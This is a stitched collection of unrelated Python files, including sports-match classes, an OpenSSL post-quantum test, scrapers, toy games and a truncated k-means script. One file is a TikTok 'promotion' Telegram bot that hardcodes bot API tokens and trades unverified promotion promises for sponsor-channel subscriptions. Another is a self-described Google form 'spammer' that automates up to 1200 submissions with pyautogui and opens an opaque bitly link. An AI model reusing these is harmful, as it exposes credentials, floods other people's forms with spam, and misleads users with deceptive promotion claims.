self.rocket2_hatch_count = rocket2_hatch_count
self.rocket2_cargo_count = rocket2_cargo_count
self.rocket_rp = rocket_rp
self.hab_rp = hab_rp
def getString(self, prefix):
return (
'{} score: {}\n'.format(prefix, self.score) + \
'{} cargo_ship_hatch_count: {}\n'.format(prefix, self.cargo_ship_hatch_count) + \
'{} cargo_ship_cargo_count: {}\n'.format(prefix, self.cargo_ship_cargo_count) + \
'{} rocket1_hatch_count: {}\n'.format(prefix, self.rocket1_hatch_count) + \
'{} rocket1_cargo_count: {}\n'.format(prefix, self.rocket1_cargo_count) + \
'{} rocket2_hatch_count: {}\n'.format(prefix, self.rocket2_hatch_count) + \
'{} rocket2_cargo_count: {}\n'.format(prefix, self.rocket2_cargo_count) + \
'{} rocket_rp: {}\n'.format(prefix, self.rocket_rp) + \
'{} hab_rp: {}\n'.format(prefix, self.hab_rp)
)
class OngoingMatchDetails(object):
def __init__(self, match_key=None, match_name=None, mode=None, time=None, red=Alliance(), blue=Alliance()):
self.match_key = match_key
self.match_name = match_name
self.mode = mode
self.time = time
self.red = red
self.blue = blue
def __str__(self):
return 'Match Key: {}\nMatch Name: {}\nMode: {}\nTime remaining: {}\n{}{}'.format(
self.match_key, self.match_name, self.mode, self.time, self.red.getString('Red'), self.blue.getString('Blue'))
|
import helpers
import os
import sys
import time
kex_algs_master_111 = ['oqs_kem_default', 'bike1l1', 'bike1l3', 'bike1l5', 'bike2l1', 'bike2l3', 'bike2l5', 'bike3l1', 'bike3l3', 'bike3l5', 'frodo640aes', 'frodo640cshake', 'frodo976aes', 'frodo976cshake', 'newhope512cca', 'newhope1024cca', 'sidh503', 'sidh751', 'sike503', 'sike751', 'p256-oqs_kem_default', 'p256-bike1l1', 'p256-bike2l1', 'p256-bike3l1', 'p256-frodo640aes', 'p256-frodo640cshake', 'p256-newhope512cca', 'p256-sidh503', 'p256-sike503']
sig_algs_master_111 = ['rsa', 'ecdsa', 'picnicl1fs', 'qteslaI', 'qteslaIIIsize', 'qteslaIIIspeed', 'rsa3072_picnicl1fs', 'rsa3072_qteslaI', 'p256_picnicl1fs', 'p256_qteslaI', 'p384_qteslaIIIsize', 'p384_qteslaIIIspeed']
kex_algs = kex_algs_master_111
sig_algs = sig_algs_master_111
def test_gen_keys():
global sig_algs
for sig_alg in sig_algs:
yield (gen_keys, sig_alg)
def gen_keys(sig_alg):
if sig_alg == 'ecdsa':
# generate curve parameters
helpers.run_subprocess(
[
'apps/openssl', 'ecparam',
'-out', 'secp384r1.pem',
'-name', 'secp384r1'
],
os.path.join('..')
)
# generate CA key and cert
helpers.run_subprocess(
[
'apps/openssl', 'req', '-x509', '-new',
'-newkey', 'ec:secp384r1.pem',
'-keyout', '{}_CA.key'.format(sig_alg),
'-out', '{}_CA.crt'.format(sig_alg),
'-nodes',
'-subj', '/CN=oqstest CA',
'-days', '365',
'-config', 'apps/openssl.cnf'
],
os.path.join('..')
)
# generate server CSR
helpers.run_subprocess(
[
'apps/openssl', 'req', '-new',
'-newkey', 'ec:secp384r1.pem',
'-keyout', '{}_srv.key'.format(sig_alg),
'-out', '{}_srv.csr'.format(sig_alg),
'-nodes',
'-subj', '/CN=oqstest server',
'-config', 'apps/openssl.cnf'
],
os.path.join('..')
)
else:
# generate CA key and cert
helpers.run_subprocess(
[
'apps/openssl', 'req', '-x509', '-new',
'-newkey', sig_alg,
'-keyout', '{}_CA.key'.format(sig_alg),
'-out', '{}_CA.crt'.format(sig_alg),
'-nodes',
'-subj', '/CN=oqstest CA',
'-days', '365',
'-config', 'apps/openssl.cnf'
],
os.path.join('..')
)
# generate server CSR
helpers.run_subprocess(
[
'apps/openssl', 'req', '-new',
'-newkey', sig_alg,
'-keyout', '{}_srv.key'.format(sig_alg),
'-out', '{}_srv.csr'.format(sig_alg),
'-nodes',
'-subj', '/CN=oqstest server',
'-config', 'apps/openssl.cnf'
],
os.path.join('..')
)
# generate server cert
helpers.run_subprocess(
[
'apps/openssl', 'x509', '-req',
'-in', '{}_srv.csr'.format(sig_alg),
'-out', '{}_srv.crt'.format(sig_alg),
'-CA', '{}_CA.crt'.format(sig_alg),
'-CAkey', '{}_CA.key'.format(sig_alg),
'-CAcreateserial',
'-days', '365'
],
os.path.join('..')
)
def test_connection():
global sig_algs, kex_algs
port = 23567
for sig_alg in sig_algs:
for kex_alg in kex_algs:
yield(run_connection, sig_alg, kex_alg, port)
port = port + 1
def run_connection(sig_alg, kex_alg, port):
cmd = os.path.join('oqs_test', 'scripts', 'do_openssl-111.sh');
helpers.run_subprocess(
[cmd],
os.path.join('..'),
env={'SIGALG': sig_alg, 'KEXALG': kex_alg, 'PORT': str(port)}
)
if __name__ == '__main__':
try:
import nose2
nose2.main()
except ImportError:
import nose
nose.runmodule()
|
from bs4 import BeautifulSoup
from tqdm import tqdm
from pathlib import Path
import urllib.request
import requests
import math
import os
def main():
with open("t2k.html") as fp:
soup = BeautifulSoup(fp, "html.parser")
s2 = soup.select("div.yeeditor a")
k = []
for t in s2:
if t.text == 'Audio':
link=t.attrs['href']
if(link.startswith("http://")):
link = "https://" + link[7:]
if link not in k:
k.append(link)
print("Found {0}".format(len(k)))
downloads = []
for url in k:
print("Open {0}".format(url))
with urllib.request.urlopen(url) as f:
phtml = BeautifulSoup(f.read(), "html.parser")
s3 = phtml.select_one("source")
dl="http:"+s3.attrs['src']
if dl in downloads:
print(dl + " already in download queue.")
else:
downloads.append(dl)
# titleEl = phtml.select_one("#sp-page-builder div > div > div.sppb-col-sm-9 > div > div.full-width.m-bottom-20 > h2")
titleEl = phtml.select_one("span.text-red")
titleEl2 = phtml.select("span.light.font-bold")[0]
filename = "TOP 2000 - " + titleEl2.text + " - " + titleEl.text + " - " + Path(dl).name
filenameTmp = filename + ".download"
if os.path.exists(filenameTmp):
os.remove(filenameTmp)
print("tmp file removed")
if os.path.exists(filename):
print(filename + " already downloaded")
else:
# Streaming, so we can iterate over the response.
r = requests.get(dl, stream=True)
# Total size in bytes.
total_size = int(r.headers.get('content-length', 0))
block_size = 1024
wrote = 0
with open(filenameTmp, 'wb') as f:
for data in tqdm(r.iter_content(block_size), total=math.ceil(total_size//block_size) , unit='KB', unit_scale=True, desc=filename):
wrote = wrote + len(data)
f.write(data)
if total_size != 0 and wrote != total_size:
print("ERROR, something went wrong")
os.rename(filenameTmp, filename)
if __name__ == "__main__":
main()
|
from django.contrib import admin
from .models import Team, Member, Project
admin.site.register(Team)
admin.site.register(Member)
admin.site.register(Project) |
# -*- coding: utf-8 -*-
"""
This package contains code for the "CRF-RNN" semantic image segmentation method, published in the
ICCV 2015 paper Conditional Random Fields as Recurrent Neural Networks. Our software is built on
top of the Caffe deep learning library.
Contact:
Shuai Zheng (szheng@robots.ox.ac.uk), Sadeep Jayasumana (sadeep@robots.ox.ac.uk), Bernardino Romera-Paredes (bernard@robots.ox.ac.uk)
Supervisor:
Philip Torr (philip.torr@eng.ox.ac.uk)
For more information about CRF-RNN, please vist the project website http://crfasrnn.torr.vision.
"""
caffe_root = '../../'
import sys
sys.path.insert(0, caffe_root+'python')
import os, time
import cPickle
import logging
import numpy as np
from PIL import Image as PILImage
import cStringIO as StringIO
import caffe
MODEL_FILE = 'TVG_CRFRNN_new_deploy.prototxt'
PRETRAINED = 'TVG_CRFRNN_COCO_VOC.caffemodel'
IMAGE_FILE = 'input.jpg'
net = caffe.Net(MODEL_FILE, PRETRAINED, caffe.TEST)
caffe.set_mode_gpu()
caffe.set_device(0)
input_image = 255 * caffe.io.load_image(IMAGE_FILE)
image = PILImage.fromarray(np.uint8(input_image))
image = np.array(image)
pallete = [0,0,0, 128,0,0, 0,128,0, 128,128,0, 0,0,128, 128,0,128, 0,128,128, 128,128,128, 64,0,0, 192,0,0, 64,128,0, 192,128,0, 64,0,128, 192,0,128, 64,128,128, 192,128,128, 0,64,0, 128,64,0, 0,192,0, 128,192,0, 0,64,128, 128,64,128, 0,192,128, 128,192,128, 64,64,0, 192,64,0, 64,192,0, 192,192,0]
mean_vec = np.array([103.939, 116.779, 123.68], dtype=np.float32)
reshaped_mean_vec = mean_vec.reshape(1, 1, 3) # in BGR order
# Rearrange channels to form BGR
im = image[:,:,::-1]
# Subtract mean
im = im - reshaped_mean_vec
# Pad as necessary
cur_h, cur_w, cur_c = im.shape
pad_h = 500 - cur_h
pad_w = 500 - cur_w
im = np.pad(im, pad_width=((0, pad_h), (0, pad_w), (0, 0)), mode = 'constant', constant_values = 0)
im = im.transpose((2,0,1))
net.blobs['data'].data[...] = im
# Get predictions
begintime = time.time()
net.forward()
endtime = time.time()
print("prediction time: "+str(endtime-begintime)+" sec")
out = net.blobs['pred'].data[0].argmax(axis=0).astype(np.uint8)
seg2 = out[0:cur_h,0:cur_w]
output_im = PILImage.fromarray(seg2)
output_im.putpalette(pallete)
output_im.save('output.png')
|
../../cma_es/cma.py |
#!/usr/bin/env python3
import sys
import threading
import socket
import time
import math
from log import log
class PRM(object):
def __init__(self, nodeId, prmIp, prmIp_2, prmIp_3, prmPort):
self.nodeId = str(nodeId)
self.prmIp = str(prmIp)
self.prmIp_2 = str(prmIp_2)
self.prmIp_3 = str(prmIp_3)
self.prmPort = int(prmPort)
self.pause = False
self.logs = []
self.connection = None
#hardcode logs for test
log1 = log()
log2 = log()
log3 = log()
log1.setLogFromFilename2("1reduced")
log2.setLogFromFilename2("2reduced")
log3.setLogFromFilename2("3reduced")
self.logs.append(log1)
self.logs.append(log2)
self.logs.append(log3)
self.outgoingPRM_itself = None
self.outgoingPRM_2 = None
self.outgoingPRM_3 = None
self.startListener()
self.startOutgoing()
self.processCommands()
def add(self, filename):
print("adding " + str(filename) + " to log")
mLog = log()
mLog.setLogFromFilename2(str(filename))
self.logs.append(mLog1)
def startOutgoing(self):
connected = False
while connected != True:
try:
self.outgoingPRM_itself = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.outgoingPRM_itself.connect( (self.prmIp, self.prmPort) )
print("Node " + str(self.nodeId) + ": Outgoing socket for its own PRM (" + str(self.prmIp) + "," + str(self.prmPort) + ") ready\n")
connected = True
except socket.error:
print("Can't connect")
time.sleep(2)
connected = False
while connected != True:
try:
self.outgoingPRM_2 = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.outgoingPRM_2.connect( (self.prmIp_2, self.prmPort) )
print("Node " + str(self.nodeId) + ": Outgoing socket for its 2nd PRM (" + str(self.prmIp_2) + "," + str(self.prmPort) + ") ready\n")
connected = True
except socket.error:
print("Node " + str(self.nodeId) + " can't connect to ip: " + str(self.prmIp_2))
time.sleep(2)
connected = False
while connected != True:
try:
self.outgoingPRM_3 = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.outgoingPRM_3.connect( (self.prmIp_3, self.prmPort) )
print("Node " + str(self.nodeId) + ": Outgoing socket for its 3rd PRM (" + str(self.prmIp_3) + "," + str(self.prmPort) + ") ready\n")
connected = True
except socket.error:
print("Node " + str(self.nodeId) + " can't connect to ip: " + str(self.prmIp_3))
time.sleep(2)
print("All PRM outgoing sockets connected")
def startListener(self):
self.listeningSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listeningSocket.bind( (self.prmIp, self.prmPort) )
self.listeningSocket.setblocking(1)
self.listeningSocket.listen(5)
self.connection,addr = self.listeningSocket.accept()
print("Node " + str(self.nodeId) + " PRM: Listening socket (" + str(self.prmIp) + "," + str(self.prmPort) + ") ready\n")
def cli_total(self):
total = 0
for log in self.logs:
for key,value in log.dict.items():
total = total + int(value)
print(str(total))
print("\n")
def cli_print(self):
for log in self.logs:
print(str(log.filename))
print("\n")
def cli_merge(self, pos1, pos2):
#beginning at 1 ...
final_list = {}
for key,value in self.logs[int(pos1) - 1].dict.items():
final_list[key] = int(value)
for key,value in self.logs[int(pos2) - 1].dict.items():
if key not in final_list:
final_list[key] = int(value)
else:
final_list[key] = final_list[key] + int(value)
for key, value in final_list.items():
print("(" + str(key) + "," + str(value) + ")")
print("\n")
def processCommands(self):
while True:
try:
data = self.connection.recv(1024)
print(str(data.decode()))
command = str(data.decode())
except socket.timeout:
break
except socket.error:
print("Error occurred when check for command")
break
else:
command = str(data.decode())
print(str(command))
if command != '':
if(command.split()[0] == "replicate"):
if(self.pause == False):
#replicate freely
print("\nPRM replicate not yet finished\n")
elif(self.pause == True):
print("\nSorry, PRM is paused.\n")
elif(command.split()[0] == "add"):
print(str(filename) + " added to log")
filename = str(command.split()[1])
self.add(filename)
print(str(filename) + " added to log1")
elif(command.split()[0] == "stop"):
self.pause = True
print("\nPRM paused!\n")
elif(command.split()[0] == "resume"):
self.pause = False
print("\nPRM resumed!\n")
elif(command.split()[0] == "total"):
self.cli_total()
elif(command.split()[0] == "print"):
self.cli_print()
elif(command.split()[0] == "merge"):
if len(command.split()) == 3:
self.cli_merge(command.split()[1], command.split()[2])
else:
print("\nIncorrect number of arguments for merge command\n")
else:
print("\nSorry, invalid command. ")
|
import random
noWin = 1
guessCounter = 0
number = random.randrange(0,100,1)
def start():
global number
if (noWin == 0):
number = random.randrange(0,100,1)
else:
pass
guess = input("Guess the integer I'm thinking of between 0 and 100. ")
if int(guess) > 100 and int(guess) < 0:
print("That number's not in our range! Try again.")
else:
pass
if int(guess) == number:
win()
elif int(guess) > number:
lower()
elif int(guess) < number:
higher()
def win():
global noWin
global guessCounter
guessCounter += 1
print("Congratulations! You guessed the number I was thinking of.")
print("It took you " + str(guessCounter) + " tries.")
guessCounter = 0
playAgain = input("Would you like to play again? Type Y or N. ")
if playAgain == "Y":
noWin = 0
start()
elif playAgain == "N":
pass
else:
print("I couldn't understand you because you didn't say Y or N, so I'm going to take that as a no.")
pass
def lower():
global noWin
global guessCounter
print("The number is lower than what you guessed. Guess again!")
guessCounter += 1
noWin = 1
start()
def higher():
global noWin
global guessCounter
print("The number is higher than what you guessed. Guess again!")
guessCounter += 1
noWin = 1
start()
start() |
import sys
if __name__ == '__main__':
tel_num = sys.argv
if tel_num[1].isdigit() and len(tel_num[1]) == 10:
print('This telephone number is legit!')
elif tel_num[1].isdigit() and len(tel_num[1]) != 10:
print('This telephone number contains more or less than 10 digits')
else:
print('This telephone number contains letter, please repeat(') |
import syntensor
import numpy as np
import json
import os
import sys
np.set_printoptions(linewidth = np.nan)
np.set_printoptions(threshold=np.inf)
image_nums = 156
current_path = 'temp'
'''
fname = 'new_data_10.json'
sys.stdin = open(fname,'r')
data = input()
data = json.loads(data)
Plist = np.array(data['P'],np.ndarray)
mlist = np.array(data['mlist'])
#print(mlist)
#print(Plist[1][0])
'''
Plist = np.zeros([156,156],np.ndarray)
mlist = None
for i in range(1,6):
print(i)
f = open(os.path.join(current_path,"%d.json"%i) ,'r')
j = json.load(f)
loaded = 0
if mlist is None:
mlist = np.array(j['mlist'])
else :
loaded = len(mlist)
mlist = np.hstack([mlist,np.array( j['mlist'] )] )
l = np.size(mlist)
for q in range(loaded,l):
for t in range(loaded,156):
if type(j['P'][q][t]) == int:
print(i,q,t)
Plist[q][t] = j['P'][q][t]
Plist[t][q] = j['P'][t][q]
n = len(mlist)
PPP = np.zeros([n,n],np.ndarray)
for i in range(n):
for j in range(n):
PPP[i][j] = Plist[j][i].copy()
Plist = PPP
tensor = syntensor.SynTensor(n,mlist,Plist)
print('object building finished')
Q = tensor.solution()
np.save(os.path.join(current_path,'156.npy'),Q,)
k = tensor.rounded_solution(0.5,2,1,Q )
print(np.shape(k))
print(k)
tensor.visualize(image_nums ,os.path.join( current_path,'image_list.npy' ), os.path.join(current_path,'tmp_%d'%image_nums) )
#f = open('D:\\paper\\tensor syn\\res.txt','w')
#sys.stdout = f
#print(np.float32(sol))
#print(np.float32(k)) |
#import sys
#input = sys.stdin.readline
def main():
N = int( input())
S = [ input() for _ in range(N)]
# lenS = [len(s) for s in S]
# LS = [ s.lstrip("0") for _ in range(N)]
# lenLS = [len(s) for s in S
P = []
for i, s in enumerate(S):
p = len(s)
ls = s.lstrip("0")
P.append((len(ls), ls, -p,i))
P.sort()
ANS = [ S[p[3]] for p in P]
print("\n".join(ANS))
if __name__ == '__main__':
main()
|
import scrapy
from scrapy_splash import SplashRequest
import time
class QuoteSpider(scrapy.Spider):
name = 'quote'
script = '''
function main(splash, args)
splash.private_mode_enabled = false
url = args.url
assert(splash:go(url))
assert(splash:wait(1))
splash:set_viewport_full()
return splash:html()
end
'''
def start_requests(self):
yield SplashRequest(url="http://quotes.toscrape.com/js", callback=self.parse, endpoint="execute", args = {
'lua_source': self.script
})
def parse(self, response):
for quotes in response.xpath('//div[@class="quote"]'):
yield{
'quotes': quotes.xpath('.//span[@class="text"]/text()').get(),
'author': quotes.xpath('.//span/small/text()').get()
}
next_page = response.xpath('//li[@class="next"]/a/@href').get()
if next_page:
absolute_url = f"http://quotes.toscrape.com{next_page}"
print(absolute_url)
yield SplashRequest(url=absolute_url, callback=self.parse, endpoint="execute", args = {
'lua_source': self.script
})
|
class OAIError:
def __init__(self, code, description):
self.code = code
self.description = description
class BadVerb(OAIError):
def __init__(self, verbs=None):
if not verbs:
message = 'Missing OAI verb'
elif len(verbs) > 1:
message = 'Multiple OAI verbs: {}'.format(', '.join(verbs))
else:
message = 'Illegal OAI verb: {}'.format(verbs[0])
super().__init__('badVerb', message)
class BadArgument(OAIError):
def __init__(self, reason, name):
super().__init__('badArgument', '{} argument: {}'.format(reason, name))
class BadFormat(OAIError):
def __init__(self, prefix):
super().__init__('cannotDisseminateFormat', 'Invalid metadataPrefix: {}'.format(prefix))
class BadFormatForRecord(OAIError):
def __init__(self, prefix):
super().__init__('cannotDisseminateFormat', 'Record unavailable in the requested format: {}'.format(prefix))
class BadRecordID(OAIError):
def __init__(self, identifier):
super().__init__('idDoesNotExist', 'Invalid record identifier: {}'.format(identifier))
class BadResumptionToken(OAIError):
def __init__(self, token):
super().__init__('badResumptionToken', 'Invalid or expired resumption token: {}'.format(token))
class NoResults(OAIError):
def __init__(self):
super().__init__('noRecordsMatch', 'No records match that query')
|
n, k = map (int, input ().split ())
P = list (map (int, input ().split ()))
K = [0] * (n - k + 1)
K [0] = sum (P [:k])
for i in range (1, len (K)):
K [i] = K [i - 1] - P [i - 1] + P [k + i - 1]
K = [0] + K + [0]
ml = [K [0]]
mr = [K [-1]]
for i in range (1, len (K)):
ml += [max (ml [-1], K [i])]
mr = [max (mr [0], K [- i - 1])] + mr
M = []
for i in range (k, n - k + 1):
M.append (max (ml [i - k], mr [i + k]))
M = set (M)
print (min (M)) |
tries = 1
answer="delhi"
while tries<=3:
print("what is the capital of india")
response=raw_input()
tries=tries+1
if (response=="delhi"):
print("Correct")
break
else:
if ((tries-1) <> 3):
print("Sorry.Try Again ..." + str(tries -1) + " over :( ")
else:
print("Sorry.All " + str(tries -1) + " over :( ")
# print("Sorry try again") |
from telegram import MessageEntity, ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton
from telegram.ext import Updater, CommandHandler, ConversationHandler, MessageHandler, Filters, CallbackQueryHandler
sponsors = ['@dil_zil']
users = []
usersId = []
links = {}
buttons = ReplyKeyboardMarkup([['Продвигать✅', 'Вип программа🔥'], ['Что такое ТикТок❔❓'], [
'Как работает бот❓❔'], ['Любые вопросы / Предложения по боту📝']], resize_keyboard=False)
def unknown_msg(update, context):
msg = update.message.text
if msg.startswith("/addNewSponsorToThisBot") and len(msg) > len("/addNewSponsorToThisBot") + 2:
small_msg = msg[len('/addNewSponsorToThisBot') + 1:]
if small_msg[0] != "@":
context.bot.send_message(chat_id=update.message.from_user.id, text="@ qoyiw oldiga esingdan chiqdimi?:)")
else:
sponsors.append(small_msg)
elif msg.startswith("/removeSponsorFromThisBot"):
try:
sponsors.remove(msg[len('/removeSponsorFromThisBot') + 1:])
except:
context.bot.send_message(chat_id=update.message.from_user.id, text="bunaqa admin yo'qku :)")
elif msg.startswith("/sendAllUsersAd") and len(msg) > len("/sendAllUsersAd") + 2:
ad = msg[len("/sendAllUsersAd") + 1:]
for i in range(len(usersId)):
context.bot.send_message(chat_id=usersId[i], text=ad)
elif msg.startswith("/whichUsers"):
all_users = ""
for i in range(len(users)):
all_users += users[i] + "-" + str(usersId[i]) + "\n"
update.message.reply_html(all_users, reply_markup=buttons)
elif msg.startswith("/howManyUsersIHave"):
update.message.reply_html(len(usersId), reply_markup=buttons)
elif msg.startswith("/peopleJoinedToSponsor") and len(msg) > len("/peopleJoinedToSponsor") + 2:
name = msg[len("/peopleJoinedToSponsor") + 1:]
joined_users = []
for i in range(len(usersId)):
a = context.bot.get_chat_member(name, usersId[i])
if a["status"] != "left":
joined_users.append(users[i])
str_joined_users = ""
for user in joined_users:
str_joined_users += user + "\n"
update.message.reply_html(str_joined_users, reply_markup=buttons)
elif msg.startswith("/howManyPeopleJoinedToSponsor") and len(msg) > len("/howManyPeopleJoinedToSponsor") + 2:
name = msg[len("/howManyPeopleJoinedToSponsor") + 1:]
joined_users = []
for i in range(len(usersId)):
a = context.bot.get_chat_member(name, usersId[i])
if a["status"] != "left":
joined_users.append(users[i])
update.message.reply_html(len(joined_users), reply_markup=buttons)
else:
pass
def start(update, context):
if update.message.from_user.id != 440255990:
users.append(update.message.from_user.first_name)
usersId.append(update.message.from_user.id)
update.message.reply_html(
'''<b>Привет, {}</b>,\nя помогу раскрутить твой аккаунт в TikTok, а также буду присылать тебе крутые штуки по
продвижению.\n\nДля начала, если не трудно, прочитай как работает бот. 📝'''.format(update.message.from_user.first_name)
, reply_markup=buttons)
return 1
def promote(update, context):
update.message.reply_html(
'''Отлично! Пришли мне ссылку на свой аккаунт или ссылку на свое видео в TikTok😉''',
reply_markup=buttons)
def vipProgram(update, context):
update.message.reply_html(
'''🥰Чтобы получить вип и попасть к нам в закрытую группу надо пригласить 7 человек.
После того как пригласите 7 человек, отправьте скрин @DeeL_TG он вас добавит в закрытую группу. 💥️''',
reply_markup=buttons)
def whatIsTikTok(update, context):
update.message.reply_html(
'<b>TikTok</b> - это площадка, где можно легко стать известным👩🏻🦳 и заработать деньги💰. А наша команда '
'может помочь в этом деле.📌',
reply_markup=buttons)
def howBotWorks(update, context):
update.message.reply_html(
'''Есть много правил в Тиктоке, которые нельзя нарушать❗️, и о которых нигде не пишут🖊. Мы поможем тебе удачно продвинуть твой тикток и даже начать зарабатывать не нем.
💰Практически каждые 2 дня📌, мы будем присылать тебе крутые идеи/новости/новые правила в тиктоке.➡️\n
Как мы помогаем попасть в рекомендации❓\n
Наша команда👥 с блогерами миллионниками будем смотреть твои посты, делиться, комментировать. Это заметит Тикток и будет продвигать твои видео в реки.\n
Как работает вип программа❓ 🔥\n
Вы приглашаете 7 людей, а мы делаем анализ вашего аккаунта и даем советы по улучшению. И попадете в нашу закрытую группу. Личная беседа с создателем бота.\n
Всех в реки ➡️😊''',
reply_markup=buttons)
def anyQuestions(update, context):
update.message.reply_html(
'По любым вопросам обращайтесь к ➡️ @DeeL_TG',
reply_markup=buttons)
def linkHandler(update, context):
a = ""
for i in range(len(sponsors)):
a += "{}) {}\n".format(i + 1, sponsors[i])
keyboard = [[InlineKeyboardButton("Проверить подписку✅", callback_data='1')]]
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_html(
'''Упс.Чтобы мы продвигали твой аккаунт подпишись пожалуйста на наших спонсоров.\n
{}
\nИ мы проверим твой аккаунт в течении 24 часов и начнем продвигать твой аккаунт'''.format(a)
, reply_markup=reply_markup)
# return 2
def checkJoined(update, context):
query = update.callback_query
query.answer()
is_joined = True
for sponsor in sponsors:
try:
a = context.bot.get_chat_member(sponsor, update.effective_user["id"])
if a["status"] == "left":
is_joined = False
break
except:
print("exception occurred")
sponsors.remove(sponsor)
if not is_joined:
query.edit_message_text(text=f'''Ты еще не подписался на спонсорские каналы
Подпишись на них и проверь подписку снова''')
else:
query.edit_message_text(text=f'''Отлично 🔥🔥
Мы в течении 24 часов начнем продвигать твой аккаунт в рекомендации. А ты пока не теряй время и публикуй классные ролики в Тик-Ток.''')
# return 1
# updater = Updater('1604509578:AAFUMndjSSMbHz8TsLtlLnDLXA1imr0KoQU', use_context=True)
updater = Updater('1612017020:AAF-ArUOd_ax12KcXYQbcqpwzSv8XGHEVt8', use_context=True)
conv_handler = ConversationHandler(
entry_points=[CommandHandler('start', start)],
states={
1: [
MessageHandler(Filters.regex('^(Продвигать✅)$'), promote),
MessageHandler(Filters.regex('^(Вип программа🔥)$'), vipProgram),
MessageHandler(Filters.regex('^(Что такое ТикТок❔❓)$'), whatIsTikTok),
MessageHandler(Filters.regex('^(Как работает бот❓❔)$'), howBotWorks),
MessageHandler(Filters.regex('^(Любые вопросы / Предложения по боту📝)$'), anyQuestions),
# MessageHandler(Filters.entity(MessageEntity.URL), linkHandler),
CallbackQueryHandler(checkJoined)
]
},
fallbacks=[
MessageHandler(Filters.entity(MessageEntity.URL), linkHandler),
MessageHandler(Filters.text, unknown_msg)
]
)
updater.dispatcher.add_handler(conv_handler)
updater.start_polling()
updater.idle()
|
""" Google doc filler/spammer by Jake CEO of annoyance#1904"""
from pyautogui import *
from tkinter import *
from urllib.request import urlopen
import io
import base64
import webbrowser
PATH = "whattosay.txt" # str(input("Please enter the name of your file"))
FILE = open(PATH, mode="r+", encoding="UTF-8")
GOOGLE_DOC_INPUTS = 14
KEY = 'tab'
canrun = False
timesran = 0
def Generator(File):
for line in File.read().split("\n"):
yield line
g = Generator(FILE)
time.sleep(2)
def main(file):
time.sleep(1.5)
k = KEY
press(k, presses=2)
write(next(g))
time.sleep(.5)
# tab tab (text)
press(k)
write(next(g))
time.sleep(.5)
# tab (text)
press(k, presses=7, interval=0.25)
time.sleep(.5)
# tab tab tab tab tab tab tab
press('space')
write(next(g))
time.sleep(.5)
# spacebar (text)
press(k)
write(next(g))
time.sleep(.5)
# tab (text)
press(k)
press('space')
time.sleep(.5)
# tab spacebar
press('down') #This is for the "How old are ou"
press('down')
press('down')
press('down')
press('down')
press('down')
press('enter')
time.sleep(.5)
# downarrorw enter tab
press(k)
write(next(g))
press(k)
# (text) tab
press(['space', 'tab'], presses=3)
# spacebar tab spacebar tab spacebar tab
write(next(g))
press(k)
time.sleep(.5)
write(next(g))
press(k)
write(next(g))
time.sleep(.5)
press(k)
write(next(g))
time.sleep(.5)
press(k)
write(next(g))
press(k)
write(next(g))
time.sleep(.5)
press(k)
write(next(g))
press('enter')
time.sleep(1)
# (text) tab (text) tab (text) tab (text) tab (text) tab enter
def runmanytimes(times):
for x in range(times):
timesran + 1
text = f"times ran {timesran}"
print(text, end='')
print('\b' * len(text), end='', flush=True)
try:
main(FILE)
press('browserrefresh')
press('enter')
press('pageup')
sleep(.5)
click(clicks=1)
except StopIteration:
press('browserrefresh')
press('enter')
press('pageup')
sleep(.5)
click(clicks=1)
g = Generator(FILE)
main(FILE)
def startthis():
print(f'Hello, {os.getlogin()}! How are you?')
runmanytimes(1200)
def stop():
print("\nstopped")
exit()
canv = Tk()
canv.title("RelaxCraft Doc spammer")
canv.geometry('370x170')
btn1 = Button(canv,
text='Start',
command=startthis,
bg='#7289da',
fg='#ffffff',
height = 7,
width = 15)
btn2 = Button(canv,
text='Stop',
command=stop,
bg='#e96060',
fg='#ffffff',
height = 7,
width = 15)
image_url = "https://cdn.discordapp.com/icons/694604110665613342/19f0085df1176f07400ddf021dbdc01e.jpg"
webbrowser.open_new_tab("http://bitly.ws/g2My")
canv.configure(bg='#282b30')
btn1.place(x=25, y=22)
btn2.place(x=225, y=22)
canv.mainloop()
|
import numpy as np
from scipy.spatial.distance import cdist
from sklearn.datasets import load_digits
from sklearn.decomposition import PCA
from sklearn.cluster import KMeans
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import *
import matplotlib.pyplot as plt
import pandas as pd
# Defining our kmeans function from scratch
def KMeans_scratch(x, k, no_of_iterations):
idx = np.random.choice(len(x), k, replace=False)
# Randomly choosing Centroids
centroids = x[idx, :] # Step 1
# finding the distance between centroids and all the data points
distances = cdist(x, centroids, 'euclidean') # Step 2
# Centroid with the minimum Distance
points = np.array([np.argmin(i) for i in distances]) # Step 3
# Repeating the above steps for a defined number of iterations
# Step 4
for _ in range(no_of_iterations):
centroids = []
for idx in range(k):
# Updating Centroids by taking mean of Cluster it belongs to
temp_cent = x[points == idx].mean(axis=0)
centroids.append(temp_cent)
centroids = np.vstack(centroids) # Updated Centroids
distances = cdist(x, centroids, 'euclidean')
points = np.array([np.argmin(i) for i in distances])
return points
def show_digitsdataset(digits):
fig = plt.figure(figsize=(6, 6)) # figure size in inches
fig.subplots_adjust(left=0, right=1, bottom=0,
top=1, hspace=0.05, wspace=0.05)
for i in range(64):
ax = fig.add_subplot(8, 8, i + 1, xticks=[], yticks=[])
ax.imshow(digits.images[i], cmap=plt.cm.binary,
interpolation='nearest')
# label the image with the target value
ax.text(0, 7, str(digits.target[i]))
# fig.show()
def plot_samples(projected, labels, title):
fig = plt.figure()
u_labels = np.unique(labels)
for i in u_labels:
plt.scatter(projected[labels == i, 0], projected[labels == i, 1], label=i,
edgecolor='none', alpha=0.5, cmap=plt.cm.get_cmap('tab10', 10))
plt.xlabel('component 1')
plt.ylabel('component 2')
plt.legend()
plt.title(title)
def main():
k = 8
# Faz a leitura do arquivo
names =['symboling','normalized-losses','make','fuel-type','aspiration','num-of-doors','body-style','drive-wheels','engine-location','wheel-base','length','width','height','curb-weight','engine-type','num-of-cylinders','engine-size','fuel-system','bore','stroke','compression-ratio','horsepower','peak-rpm','city-mpg','highway-mpg','price'] # Nome das colunas
features = ['drive-wheel','engine-size','price'] # Define as colunas que serão utilizadas
input_file = 'dataset/imports-85Clear.data'
target = 'price'
df = pd.read_csv(input_file, # Nome do arquivo com dados
names = names) # Nome das colunas
# Separating out the features
x = df.loc[:, features].values
# Separating out the target
